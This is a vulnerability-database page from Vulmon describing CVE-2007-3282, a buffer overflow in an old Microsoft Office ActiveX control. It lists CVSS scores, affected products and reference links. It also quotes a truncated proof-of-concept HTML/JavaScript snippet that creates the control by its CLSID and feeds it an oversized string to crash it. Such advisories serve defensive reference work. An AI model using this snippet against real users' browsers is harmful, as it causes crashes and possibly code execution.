Published: 19/06/2007 Updated: 11/10/2017

CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10

VMScore: 785

Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Buffer overflow in the Microsoft Office MSODataSourceControl ActiveX object allows remote malicious users to cause a denial of service (crash) and possibly execute arbitrary code via a long argument to the DeleteRecordSourceIfUnused method.

Vulnerable Product	Search on Vulmon	Subscribe to Product
microsoft office
microsoft office msodatasourcecontrol activex

MSODataSourceControlDeleteRecordSourceIfUnused COM-object B0F POC Tested on full patched XP/SP2, IE7, MSO2003 <html> <object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object> <script language="javascript"> var b = 'AAAA'; while (blength <= 256) b+=b; ctlDeleteRecordSourceIfUnused(b); </script& ...

NVD-CWE-Other http://www.securitytracker.com/id?1018251 http://osvdb.org/38471 https://exchange.xforce.ibmcloud.com/vulnerabilities/34849 https://www.exploit-db.com/exploits/4067 https://nvd.nist.gov https://www.exploit-db.com/exploits/4067/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2007-3282

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect